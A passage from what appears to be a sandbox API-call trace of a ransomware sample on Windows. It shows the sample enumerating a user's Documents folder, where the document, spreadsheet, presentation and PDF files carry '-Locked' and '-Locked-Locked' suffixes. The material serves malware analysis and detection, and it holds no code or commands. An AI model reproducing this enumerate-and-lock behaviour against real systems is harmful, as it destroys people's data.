ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3361452d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked-Locked", cAlternateFileName="AZYKAG~1.RTF")) returned 1 [0302.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b474bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b474bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b474bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked", cAlternateFileName="BFC~2.DOC")) returned 1 [0302.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3361a6d4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3361a6d4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3361a6d4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked-Locked", cAlternateFileName="BFC~1.DOC")) returned 1 [0302.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b55fb6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b55fb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b55fb6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked", cAlternateFileName="CERXR1~2.XLS")) returned 1 [0302.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336208d1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336208d1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336208d1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked-Locked", cAlternateFileName="CERXR1~1.XLS")) returned 1 [0302.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b63866, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b63866, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b63866, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0302.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33627dbf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33627dbf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33627dbf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0302.146] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b72239, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b72239, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b72239, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked", cAlternateFileName="EUNC2M~2.XLS")) returned 1 [0302.146] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3363059b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3363059b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3363059b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", cAlternateFileName="EUNC2M~1.XLS")) returned 1 [0302.146] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b831b0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b831b0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b831b0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked", cAlternateFileName="FQNOQA~2.XLS")) returned 1 [0302.147] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336367c9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336367c9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336367c9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", cAlternateFileName="FQNOQA~1.XLS")) returned 1 [0302.147] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ba8fd6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ba8fd6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ba8fd6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked", cAlternateFileName="FUKBCY~2.PPT")) returned 1 [0302.147] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3363c98c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3363c98c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3363c98c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", cAlternateFileName="FUKBCY~1.PPT")) returned 1 [0302.147] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bc16b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bc16b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bc16b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked", cAlternateFileName="HBFGJD~1.DOC")) returned 1 [0302.148] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364520b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364520b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364520b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked-Locked", cAlternateFileName="HBFGJD~2.DOC")) returned 1 [0302.148] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd1558, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bd1558, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bd1558, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked", cAlternateFileName="HUM71H~2.PDF")) returned 1 [0302.149] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364edfc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364edfc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364edfc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked-Locked", cAlternateFileName="HUM71H~1.PDF")) returned 1 [0302.149] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0302.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32be4c72, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32be4c72, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32be4c72, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked", cAlternateFileName="JOED-0~2.PPT")) returned 1 [0302.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3364edfc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3364edfc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3364edfc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked-Locked", cAlternateFileName="JOED-0~1.PPT")) returned 1 [0302.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bf97aa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bf97aa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bf97aa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked", cAlternateFileName="JYYUHN~2.OTS")) returned 1 [0302.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3366c3f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3366c3f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3366c3f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", cAlternateFileName="JYYUHN~1.OTS")) returned 1 [0302.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0302.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0302.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0302.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c09621, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c09621, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c09621, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked", cAlternateFileName="NYMPGD~2.DOC")) returned 1 [0302.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336738ea, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336738ea, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336738ea, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked-Locked", cAlternateFileName="NYMPGD~1.DOC")) returned 1 [0302.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c1a8b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c1a8b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c1a8b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked", cAlternateFileName="O4ACLZ~2.DOC")) returned 1 [0302.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3367d592, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3367d592, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3367d592, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked-Locked", cAlternateFileName="O4ACLZ~1.DOC")) returned 1 [0302.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0302.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c3a4ac, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c3a4ac, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c3a4ac, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked", cAlternateFileName="PA5CSH~2.DOC")) returned 1 [0302.153] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336835d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336835d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336835d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked-Locked", cAlternateFileName="PA5CSH~1.DOC")) returned 1 [0302.153] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0302.153] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c48e1b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c48e1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c48e1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked", cAlternateFileName="W7ZBDB~2.PPT")) returned 1 [0302.153] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3368984b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3368984b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3368984b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", cAlternateFileName="W7ZBDB~1.PPT")) returned 1 [0302.155] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c5a17a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c5a17a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c5a17a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked", cAlternateFileName="YPCZCD~2.PPT")) returned 1 [0302.155] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3368e5ec, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3368e5ec, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3368e5ec, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked-Locked", cAlternateFileName="YPCZCD~1.PPT")) returned 1 [0302.155] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c6ff73, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c6ff73, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c6ff73, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked", cAlternateFileName="ZBHJ~1.PDF")) returned 1 [0302.155] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33866cbc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33866cbc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33866cbc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked-Locked", cAlternateFileName="ZBHJ~2.PDF")) returned 1 [0302.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c7d5f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c7d5f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c7d5f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked", cAlternateFileName="ZFNXJ8~2.DOC")) returned 1 [0302.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3386e285, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", cAlternateFileName="ZFNXJ8~1.DOC")) returned 1 [0302.156] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.156] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.157] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0302.157] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0302.157] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.157] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.157] FindNextFileW (in: hFindFile=0x737a28, 